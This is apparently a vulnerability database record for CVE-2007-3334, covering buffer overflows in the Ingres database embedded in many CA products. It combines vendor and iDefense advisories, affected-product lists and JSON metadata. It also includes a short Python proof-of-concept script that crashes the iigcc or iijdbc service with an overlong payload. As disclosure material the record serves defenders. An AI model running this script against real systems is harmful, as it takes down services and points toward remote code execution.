var-200706-0395
Vulnerability from variot

Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.

4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow, and the saved return address can be overwritten.

5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a cumulative High risk rating.

Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1

Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.

Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp

Workaround: None

References (URLs may wrap):
CA SupportConnect: http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/
iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending http://osvdb.org/

Changelog for this advisory: v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Copyright (c) 2007 CA. All rights reserved.

Ingres Database Multiple Heap Corruption Vulnerabilities

iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007

I. BACKGROUND

Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM uses Ingres to store quarantined viruses and blocked HTTP requests/replies. For more information visit the following URLs.

http://www3.ca.com/solutions/Product.aspx?ID=1013

http://www.ingres.com/

II. DESCRIPTION

The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.

The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.

III. ANALYSIS

Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).

Exploitation has been demonstrated to be trivial.

IV. DETECTION

Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.

V. WORKAROUND

Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.

VI. VENDOR RESPONSE

CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.

http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

01/16/2007 Initial vendor notification
01/17/2007 Initial vendor response
06/21/2007 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

Date: 2010-08-14

Author: fdisk

Version: 2.6

Tested on: Windows 2003 Server SP1 en

CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338

Notes: Fixed in the last version.

please let me know if you are/were able to get code execution

    import socket
    import sys

    if len(sys.argv) != 4:
        print "Usage: ./CAAdvantageDoS.py "
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    service = sys.argv[3]

    if service == "iigcc":
        payload = "\x41" * 2106
    elif service == "iijdbc":
        payload = "\x41" * 1066
    else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

    payload += "\x42" * 4

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "Sending payload"
    s.send(payload)
    data = s.recv(1024)
    s.close()
    print 'Received', repr(data)

    print service + " crashed"



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200706-0395",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "database server",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ingres",
        "version": "3.0.3"
      },
      {
        "model": "etrust secure content manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ca",
        "version": "8.0"
      },
      {
        "model": "etrust secure content manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ca",
        "version": "r8"
      },
      {
        "model": "windows",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "all windows",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "20060"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "3.0.3"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "2.6"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "2.5"
      },
      {
        "model": "associates wily soa manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates unicenter workload control center 1.0.sp4",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates unicenter workload control center sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter tng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.4.2"
      },
      {
        "model": "associates unicenter tng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      },
      {
        "model": "associates unicenter tng 2.4.2j",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates unicenter software delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter serviceplus service desk sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter serviceplus service desk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "5.5"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.2"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.5"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0.2"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter service delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service catalog",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter patch management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.1"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter management portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.1.1"
      },
      {
        "model": "associates unicenter lightweight portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2"
      },
      {
        "model": "associates unicenter job management option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter enterprise job manager sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter enterprise job manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter desktop management suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter desktop and server management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter database command center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter ca web services distributed management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.5"
      },
      {
        "model": "associates unicenter ca web services distributed management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.11"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.2.1"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.3"
      },
      {
        "model": "associates unicenter asset management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter asset intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter advanced systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates etrust web access control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates etrust secure content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.0"
      },
      {
        "model": "associates etrust network forensics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust iam toolkit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust iam toolkit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust iam suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust directory",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust audit r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates etrust admin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust admin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.0"
      },
      {
        "model": "associates etrust admin sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust admin sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates docserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates cleverpath predictive analysis server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0"
      },
      {
        "model": "associates cleverpath aion bre",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.1"
      },
      {
        "model": "associates cleverpath aion bpm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.1"
      },
      {
        "model": "associates ccs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates brightstor storage resource manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates brightstor storage command center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates brightstor enterprise backup for tru64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for hp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor arcserve backup for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates brightstor arcserve backup for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "9.0"
      },
      {
        "model": "associates brightstor arcserve backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates brightstor arcserve backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates arcserve backup for laptops and desktops",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates allfusion harvest change manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates allfusion harvest change manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates allfusion enterprise workbench sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates advantage data transformer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:ca:etrust_secure_content_manager",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:ingres:database_server",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-3334",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2007-3334",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2007-3334",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2007-3334",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200706-357",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. 
\n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n   Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n   r3.0 0305, 